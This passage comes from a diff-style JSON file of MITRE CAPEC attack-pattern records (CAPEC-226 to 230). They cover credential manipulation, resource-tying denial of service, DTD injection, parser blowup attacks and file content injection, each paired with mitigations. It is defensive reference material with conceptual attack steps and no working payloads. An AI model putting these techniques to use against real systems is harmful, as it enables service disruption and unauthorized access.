"course-of-action--e117150b-4841-447b-aef4-8a9aa1d5ad94", + "target_ref": "attack-pattern--76e6fe1e-34f2-40cd-8f12-f4d4f9c41808", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An 
attacker manipulates an existing credential in order to gain access to a target application. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. An attacker may be able to manipulate a credential sniffed from an existing connection in order to gain access to a target server.", + "external_references": [ + { + "external_id": "CAPEC-226", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/226.html" + }, + { + "external_id": "CWE-565", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + } + ], + "id": "attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Session Credential Falsification through Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, a credential in the form of a web cookie might have a field that indicates the access rights of a user. By manually tweaking this cookie, a user might be able to increase their access rights to the server. Alternately an attacker may be able to manipulate an existing credential to appear as a different user. This attack differs from falsification through prediction in that the user bases their modified credentials off existing credentials instead of using patterns detected in prior credentials to create a new credential that is accepted because it fits the pattern. 
As a result, an attacker may be able to impersonate other users or elevate their permissions to a targeted service.\n ", + "x_capec_prerequisites": [ + "The targeted application must use session credentials to identify legitimate users." + ], + "x_capec_resources_required": [ + "An attacker will need tools to sniff existing credentials (possibly their own) in order to retrieve a base credential for modification. They will need to understand how the components of the credential affect server behavior and how to manipulate this behavior by changing the credential. Finally, they will need tools to allow them to craft and transmit a modified credential." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. 
By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.", + "external_references": [ + { + "external_id": "CAPEC-227", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/227.html" + }, + { + "external_id": "CWE-400", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "description": "Endpoint Denial of Service", + "external_id": "T1499", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + } + ], + "id": "attack-pattern--6e3dda09-c1da-4f44-a0b3-e0e3b6fe0601", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Sustained Client Engagement", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The degree to which the attack is successful depends upon the adversary's ability to sustain resource requests over time with a volume that exceeds the normal usage by legitimate users, as well as other mitigating circumstances such as the target's ability to shift load or acquire additional resources to deal with the depletion. This attack differs from a flooding attack as it is not entirely dependent upon large volumes of requests, and it differs from resource leak exposures which tend to exploit the surrounding environment needed for the resource to function. 
The key factor in a sustainment attack are the repeated requests that take longer to process than usual.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934" + ], + "x_capec_prerequisites": [ + "This pattern of attack requires a temporal aspect to the servicing of a given request. Success can be achieved if the adversary can make requests that collectively take more time to complete than legitimate user requests within the same time frame." + ], + "x_capec_resources_required": [ + "To successfully execute this pattern of attack, a script or program is often required that is capable of continually engaging the target and maintaining sustained usage of a specific resource. Depending on the configuration of the target, it may or may not be necessary to involve a network or cluster of objects all capable of making parallel requests." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Potential mitigations include requiring a unique login for each resource request, constraining local unprivileged access by disallowing simultaneous engagements of the resource, or limiting access to the resource to one access per IP address. 
In such scenarios, the adversary would have to increase engagements either by launching multiple sessions manually or programmatically to counter such defenses.", + "id": "course-of-action--ba77ea83-e6e2-4046-9e24-9a6bd2a3a947", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-227-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f425c6e4-a641-4d70-890a-e1583d4defe9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba77ea83-e6e2-4046-9e24-9a6bd2a3a947", + "target_ref": "attack-pattern--6e3dda09-c1da-4f44-a0b3-e0e3b6fe0601", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker injects malicious content into an application's DTD in an attempt to produce a negative technical impact. DTDs are used to describe how XML documents are processed. 
Certain malformed DTDs (for example, those with excessive entity expansion as described in CAPEC 197) can cause the XML parsers that process the DTDs to consume excessive resources resulting in resource depletion.", + "external_references": [ + { + "external_id": "CAPEC-228", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/228.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Ryan Naraine, DoS Flaw in SOAP DTD Parameter, InternetNews.com, 2003--12---15, ITBusiness Edge, Quinstreet Inc.", + "external_id": "REF-86", + "source_name": "reference_from_CAPEC", + "url": "http://www.internetnews.com/dev-news/article.php/3289191" + } + ], + "id": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "DTD Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--8e3a14fd-870a-4286-866d-805107c7d922" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975" + ], + "x_capec_child_of_refs": [ + "attack-pattern--aa6a831a-8eae-4690-b4a2-ff3e4d43a716" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instances of web services to process XML requests.

  2. Techniques
    Use an automated tool to record all instances of URLs to process XML requests.
    Use a browser to manually explore the website and analyze how the application processes XML requests.
  3. Determine use of XML with DTDs: Examine application input to identify XML input that leverage the use of one or more DTDs.

  4. Techniques
    Examine any available documentation for the application that discusses expected XML input.
    Exercise the application using XML input with and without a DTD specified. Failure without DTD likely indicates use of DTD.

Exploit

  1. [Craft and inject XML containg malicious DTD payload]

  2. Techniques
    Inject XML expansion attack that creates a Denial of Service impact on the targeted server using its DTD.
    Inject XML External Entity (XEE) attack that can cause the disclosure of confidential information, execute abitrary code, create a Denial of Service of the targeted server, or several other malicious impacts.
", + "x_capec_prerequisites": [ + "The target must be running an XML based application that leverages DTDs." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Sanitize incoming DTDs to prevent excessive expansion or other actions that could result in impacts like resource depletion.", + "id": "course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fa5c2311-5b43-4e21-9d1c-a3f38ff378bc", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7", + "target_ref": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Disallow the inclusion of DTDs as part of incoming messages.", + "id": "course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--683d38cf-120d-459e-b68f-e88ec1e6e9ea", + 
"modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c", + "target_ref": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use XML parsing tools that protect against DTD attacks.", + "id": "course-of-action--781b2c2c-e9f3-4d8a-b2e3-806800893f1a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--696727ca-cfe5-4525-84d1-4285f4a40004", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--781b2c2c-e9f3-4d8a-b2e3-806800893f1a", + "target_ref": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack exploits certain serialized data parsers (e.g., XML, YAML, etc.) which manage data in an inefficient manner. The attacker crafts an serialized data file with multiple configuration parameters in the same dataset. In a vulnerable parser, this results in a denial of service condition where CPU resources are exhausted because of the parsing algorithm. 
The weakness being exploited is tied to parser implementation and not language specific.", + "external_references": [ + { + "external_id": "CAPEC-229", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/229.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "XML Attribute Blowup", + "external_id": "41", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-Attribute-Blowup" + } + ], + "id": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Serialized Data Parameter Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, assume that the victim is running a vulnerable parser such as .NET framework 1.0. This results in a quadratic runtime of O(n^2).\n \n A document with n attributes results in (n^2)/2 operations to be performed. If an operation takes 100 nanoseconds then a document with 100,000 operations would take 500s to process. In this fashion a small message of less than 1MB causes a denial of service condition on the CPU resources.\n ", + "\n A YAML bomb leverages references within a YAML file to create exponential growth in memory requirements. By creating a chain of keys whose values are a list of multiple references to the next key in the chain, the amount of memory and processing required to handle the data grows exponentially. This may lead to denial of service or instability resulting from excessive resource consumption.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instances of web services to process requests using serialized data.

  2. Techniques
    Use an automated tool to record all instances of URLs to process requests from serialized data.
    Use a browser to manually explore the website and analyze how the application processes requests using serialized data.

Exploit

  1. Launch a Blowup attack: The attacker crafts malicious messages that contain multiple configuration parameters in the same dataset.

  2. Techniques
    Send the malicious crafted message containing the multiple configuration parameters to the target URL, causing a denial of service.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The server accepts input in the form of serialized data and is using a parser with a runtime longer than O(n) for the insertion of a new configuration parameter in the data container.(examples are .NET framework 1.0 and 1.1)" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated completely by using a parser that is not using a vulnerable container.", + "id": "course-of-action--2a9a6199-3e7e-4a2d-960a-04abb1fec1e0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-229-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2a9a6199-3e7e-4a2d-960a-04abb1fec1e0", + "target_ref": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Mitigation may limit the number of configuration parameters per dataset.", + "id": "course-of-action--5dbcf5bb-4047-46ef-945a-d3b658626300", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-229-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c4b0778c-9df8-4c69-a647-540ef4e5f2aa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5dbcf5bb-4047-46ef-945a-d3b658626300", + "target_ref": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary poisons files with a malicious payload (targeting the file systems accessible by the target software), which may be passed through by standard channels such as via email, and standard web content like PDF and multimedia files. The adversary exploits known vulnerabilities or handling routines in the target processes, in order to exploit the host's trust in executing remote content, including binary files.", + "external_references": [ + { + "external_id": "CAPEC-23", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/23.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "modified": "2022-02-22T00:00:00.000Z", + "name": "File Content Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n PHP is a very popular language used for developing web applications. When PHP is used with global variables, a vulnerability may be opened that affects the file system. A standard HTML form that allows for remote users to upload files, may also place those files in a public directory where the adversary can directly access and execute them through a browser. This vulnerability allows remote adversaries to execute arbitrary code on the system, and can result in the adversary being able to erase intrusion evidence from system and application logs.\n " + ], + "x_capec_extended_description": "\n Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the adversary knows the standard handling routines and can identify vulnerabilities and entry points, they can be exploited by otherwise seemingly normal content. Once the attack is executed, the adversary's program can access relative directories such as C:\\Program Files or other standard system directories to launch further attacks. 
In a worst case scenario, these programs are combined with other propagation logic and work as a virus.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c" + ], + "x_capec_prerequisites": [ + "The target software must consume files.", + "The adversary must have access to modify files that the target software will consume." + ], + "x_capec_skills_required": { + "Medium": "How to poison a file with malicious payload that will exploit a vulnerability when the file is opened. The adversary must also know how to place the file onto a system where it will be opened by an unsuspecting party, or force the file to be opened." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e333960-e5cb-4589-9771-ba6ba993cd18", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Validate all input for content including files. 
Ensure that if files and remote content must be accepted that once accepted, they are placed in a sandbox type location so that lower assurance clients cannot write up to higher assurance processes (like Web server processes for example)", + "id": "course-of-action--f1b328f3-e5f7-4c0b-8cd1-92c178d9dffa", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-23-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0c333c67-716a-4a61-8bf6-5f10bc34123e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1b328f3-e5f7-4c0b-8cd1-92c178d9dffa", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc7b7a16-616e-46d7-b94c-09b98235f8a0", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b7de6045-8f58-4418-9b3f-fc61acce3199", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Virus scanning on host", + "id": "course-of-action--1d44c0fd-4e64-4fa4-8d72-c90a53d49497", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-23-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a05f53a8-d3f4-43a9-918b-d1d51c74287e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1d44c0fd-4e64-4fa4-8d72-c90a53d49497", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--960af13f-fe8f-4f17-982b-7e5360329636", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Applications often need to transform data in and out of a data format (e.g., XML and YAML) by using a parser. 
It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. By nesting these structures, causing the data to be repeatedly substituted, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization.", + "external_references": [ + { + "external_id": "CAPEC-230", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/230.html" + }, + { + "external_id": "CWE-112", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/112.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-674", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/674.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Shlomo, Yona, XML Parser Attacks: A summary of ways to attack an XML Parser, 2007", + "external_id": "REF-89", + "source_name": "reference_from_CAPEC", + "url": "http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html" + } + ], + "id": "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Serialized Data with Nested Payloads", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + 
"Resource Consumption", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. An adversary determines the input data stream that is being processed by a data parser that supports using substitution on the victim's side.

Exploit

  1. An adversary crafts input data that may have an adverse effect on the operation of the parser when the data is parsed on the victim's system.

", + "x_capec_extended_description": "\n An adversary's goal is to leverage parser failure to their advantage. In most cases this type of an attack will result in a Denial of Service due to an application becoming unstable, freezing, or crashing. However it may be possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [REF-89].\n This attack is most closely associated with web services using SOAP or a Rest API, because remote service requesters can post malicious payloads to the service provider. The main weakness is that the service provider generally must inspect, parse, and validate the messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that this attack targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975" + ], + "x_capec_prerequisites": [ + "An application's user-controllable data is expressed in a language that supports subsitution.", + "An application does not perform sufficient validation to ensure that user-controllable data is not malicious." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully validate and sanitize all user-controllable data prior to passing it to the data parser routine. 
Ensure that the resultant data is safe to pass to the data parser.", + "id": "course-of-action--b31f921a-2494-4fb9-ac18-d36b931a8d7d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-230-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8e30d321-aee2-4f0d-942b-aab56874c9cd", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b31f921a-2494-4fb9-ac18-d36b931a8d7d", + "target_ref": "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform validation on canonical data.", + "id": "course-of-action--7ca13542-450d-4218-bd44-e0cf51b2ecc3", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-230-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8c47b649-733d-47c3-a553-9ef173fdeb95", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7ca13542-450d-4218-bd44-e0cf51b2ecc3", + "target_ref": 